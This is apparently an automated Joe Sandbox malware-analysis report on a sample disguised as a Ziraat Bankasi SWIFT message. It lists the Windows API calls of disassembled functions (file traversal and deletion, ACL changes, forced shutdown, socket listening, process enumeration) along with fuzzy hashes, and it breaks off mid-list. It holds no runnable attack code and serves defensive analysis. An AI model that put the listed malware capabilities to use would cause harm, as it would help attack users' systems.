                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000D1B50
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1B65
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1B7C
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 000D1B8E
                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 000D1BA8
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000D1BC0
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000D1BCB
                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000D1BE7
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1C0E
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1C25
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000D1C37
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(001339FC), ref: 000D1C55
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000D1C5F
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000D1C6C
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000D1C7C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                                                        • Opcode ID: b8dfa699bb90ed39d1970a555f0663a8a642ab74d088ad7d0f1c7ffca55641e5
                                                                                                                                                        • Instruction ID: 3a0a21db5c610979e1b01d9f176a1aac1ae524c92be15fb4461cf105431af203
                                                                                                                                                        • Opcode Fuzzy Hash: b8dfa699bb90ed39d1970a555f0663a8a642ab74d088ad7d0f1c7ffca55641e5
                                                                                                                                                        • Instruction Fuzzy Hash: AF31A232A40719BADB10ABF0EC49ADE77EC9F05320F140197E811E3191EFB0DA858B64
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 000D1CAB
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1CC0
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1CD7
                                                                                                                                                          • Part of subcall function 000C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000C6BEF
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000D1D06
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000D1D11
                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000D1D2D
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1D54
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D1D6B
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000D1D7D
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(001339FC), ref: 000D1D9B
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000D1DA5
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000D1DB2
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000D1DC2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                                                        • Opcode ID: fa29f4bc04f45ab549cfb2814c7732a1a0aec81a00a03c7e5b5edb922a10e3aa
                                                                                                                                                        • Instruction ID: 3df46952a36b1e74e0c616900904d9035340ff2f5c3f147b249dd007ccc4bdcd
                                                                                                                                                        • Opcode Fuzzy Hash: fa29f4bc04f45ab549cfb2814c7732a1a0aec81a00a03c7e5b5edb922a10e3aa
                                                                                                                                                        • Instruction Fuzzy Hash: 9A31B03290471ABACF60ABE0EC49ADE77AE9F45324F140596F811A3291DF70DA85CB74
                                                                                                                                                        APIs
                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000CD0D8
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CD0FA
                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 000CD137
                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000CD15C
                                                                                                                                                        • _memset.LIBCMT ref: 000CD17B
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 000CD1B7
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000CD1EC
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 000CD1F7
                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 000CD200
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 000CD20A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                                                        • Opcode ID: 32f698fa1ab5c2371930461e2968d0e71ed22ba2edbce9f9ec09e265f9bb1478
                                                                                                                                                        • Instruction ID: 782845cb9f8cd84f31b314319b2a0ac0a0d20481de3e4de6eb76d80d88b79c3c
                                                                                                                                                        • Opcode Fuzzy Hash: 32f698fa1ab5c2371930461e2968d0e71ed22ba2edbce9f9ec09e265f9bb1478
                                                                                                                                                        • Instruction Fuzzy Hash: 9031AFB650010AABDB21DFA0DC49FEF37BCEF89740F1041BAF909D2161EB7096848B24
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
                                                                                                                                                          • Part of subcall function 000BABBB: GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
                                                                                                                                                          • Part of subcall function 000BABBB: GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
                                                                                                                                                          • Part of subcall function 000BABBB: HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
                                                                                                                                                          • Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E
                                                                                                                                                          • Part of subcall function 000BAC56: GetProcessHeap.KERNEL32(00000008,000BA6B5,00000000,00000000,?,000BA6B5,?), ref: 000BAC62
                                                                                                                                                          • Part of subcall function 000BAC56: HeapAlloc.KERNEL32(00000000,?,000BA6B5,?), ref: 000BAC69
                                                                                                                                                          • Part of subcall function 000BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BA6B5,?), ref: 000BAC7A
                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BA6D0
                                                                                                                                                        • _memset.LIBCMT ref: 000BA6E5
                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BA704
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 000BA715
                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 000BA752
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BA76E
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 000BA78B
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BA79A
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 000BA7A1
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BA7C2
                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 000BA7C9
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BA7FA
                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BA820
                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BA834
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3996160137-0
                                                                                                                                                        • Opcode ID: e2572fb780a3d85386e80cdbb14e4f526a47e6266e8d81b07461cdc6c3db4394
                                                                                                                                                        • Instruction ID: ee5702ca2787a60b616c87b1f4a5a3e2e32b881135d045ad2d7a1c62a64423db
                                                                                                                                                        • Opcode Fuzzy Hash: e2572fb780a3d85386e80cdbb14e4f526a47e6266e8d81b07461cdc6c3db4394
                                                                                                                                                        • Instruction Fuzzy Hash: 08515A71A0020AABDF00DFA5DC45EEEBBB9FF09300F048129F915A7691DB749A46CB61
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                        • API String ID: 0-4052911093
                                                                                                                                                        • Opcode ID: 1c22304cbd5ce71578df01328c2caeee32e7e2b8aafab6f89d210f6be35bfc5e
                                                                                                                                                        • Instruction ID: 7a61442f97bf6c1c7a49e3db6d7e6bc3690ee24bf41d2d4e04a56ceef693dffb
                                                                                                                                                        • Opcode Fuzzy Hash: 1c22304cbd5ce71578df01328c2caeee32e7e2b8aafab6f89d210f6be35bfc5e
                                                                                                                                                        • Instruction Fuzzy Hash: F5727371E04219DBDF24DF98C8407EEB7B5BF48310F24816AE999EB285DB709E41DB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8
                                                                                                                                                          • Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C6441
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000C645F
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 000C6474
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000C64A3
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C64B8
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C64CA
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 000C64DA
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C64EB
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000C6506
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                                                        • Opcode ID: d2c228beac4376225508e4eb424b9e8f3f530bfda923b660da86f2fdbe608437
                                                                                                                                                        • Instruction ID: d985a5a01471a540b5a024935cc5ac737d8a1b66a50f79bf5b90fc31466f18fc
                                                                                                                                                        • Opcode Fuzzy Hash: d2c228beac4376225508e4eb424b9e8f3f530bfda923b660da86f2fdbe608437
                                                                                                                                                        • Instruction Fuzzy Hash: 123144B24083889AC731EBE48885EDFB7DCAF56310F44491EF5D9C3142EA36D5498767
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                                        • Opcode ID: d68ddd79950484310a78aa8edca6e35ea9042267b32f69c6fbf3732b1877500a
                                                                                                                                                        • Instruction ID: 891d730576f5b87f00b47d2e3c4cbfd55ed56a95c349e44b47c3bbd6efc2b972
                                                                                                                                                        • Opcode Fuzzy Hash: d68ddd79950484310a78aa8edca6e35ea9042267b32f69c6fbf3732b1877500a
                                                                                                                                                        • Instruction Fuzzy Hash: 1721A131700214AFDB11AFA4EC49F6D77A9FF04710F04801AF98ADB262CB72ED418B61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000B9ABF: CLSIDFromProgID.OLE32 ref: 000B9ADC
                                                                                                                                                          • Part of subcall function 000B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 000B9AF7
                                                                                                                                                          • Part of subcall function 000B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 000B9B05
                                                                                                                                                          • Part of subcall function 000B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000B9B15
                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 000DC235
                                                                                                                                                        • _memset.LIBCMT ref: 000DC242
                                                                                                                                                        • _memset.LIBCMT ref: 000DC360
                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 000DC38C
                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 000DC397
                                                                                                                                                        Strings
                                                                                                                                                        • NULL Pointer assignment, xrefs: 000DC3E5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                                                        • Opcode ID: 2f8b89532f7329858a1b610d9819ac284515b6cd2aba0544e4571be1d6ac978e
                                                                                                                                                        • Instruction ID: 3d1e9538031a224e6e47265f9e6cfcd86442da4a874cb6f0f09363dd52513b42
                                                                                                                                                        • Opcode Fuzzy Hash: 2f8b89532f7329858a1b610d9819ac284515b6cd2aba0544e4571be1d6ac978e
                                                                                                                                                        • Instruction Fuzzy Hash: E9913C71D00219ABDB10DFA4DC95EDEBBB9FF08710F10815AF515A7282EB719A45CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 000D1FE1
                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000D2011
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D2025
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000D2040
                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000D20DE
                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000D20F4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 3356411064-438819550
                                                                                                                                                        • Opcode ID: 04f5223bca9f16c05debdae3301642ac0e319026db5ddc7ed5d89ee49c526e31
                                                                                                                                                        • Instruction ID: 4356b7a7b7fca8fcc879fed4064e3575c2bcb422a7acb776f6439d64eeb62b83
                                                                                                                                                        • Opcode Fuzzy Hash: 04f5223bca9f16c05debdae3301642ac0e319026db5ddc7ed5d89ee49c526e31
                                                                                                                                                        • Instruction Fuzzy Hash: 7E418E7190030AAFCF64EFA4CC49BEEBBB4FF15314F144456E855A3292EB709A84CB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
                                                                                                                                                          • Part of subcall function 000BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
                                                                                                                                                          • Part of subcall function 000BB134: GetLastError.KERNEL32 ref: 000BB1BA
                                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 000C7A0F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                                                        • Opcode ID: 5a1e262dc4657b631ec4dedeeee87272a643b67e34ced5d48db3d6a46d6b0935
                                                                                                                                                        • Instruction ID: 71284d63fa56042ef72b6cfc583678fff12cd63b594099d103021e1959cf4fb7
                                                                                                                                                        • Opcode Fuzzy Hash: 5a1e262dc4657b631ec4dedeeee87272a643b67e34ced5d48db3d6a46d6b0935
                                                                                                                                                        • Instruction Fuzzy Hash: D701D4716582116AF76C27B89C4AFBF32989B40340F14082CF95BA20D2D6A09E0089A6
                                                                                                                                                        APIs
                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 000D8CA8
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D8CB7
                                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 000D8CD3
                                                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 000D8CE2
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D8CFC
                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 000D8D10
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279440585-0
                                                                                                                                                        • Opcode ID: f03af0d513f688e570a3fb93d22acac0de13ce3ad32fcc260cecf02b83b8cd5f
                                                                                                                                                        • Instruction ID: a55719ee9f70661589468afa9db3b36cf3e95e6d86a68ad7cd024a83aa544aad
                                                                                                                                                        • Opcode Fuzzy Hash: f03af0d513f688e570a3fb93d22acac0de13ce3ad32fcc260cecf02b83b8cd5f
                                                                                                                                                        • Instruction Fuzzy Hash: A921B131600200EFCB10EF68DD45BAEB7E9EF48714F148159F956A73D2CB70AD419B61
                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6554
                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6564
                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 000C6583
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000C65A7
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C65BA
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C65F9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
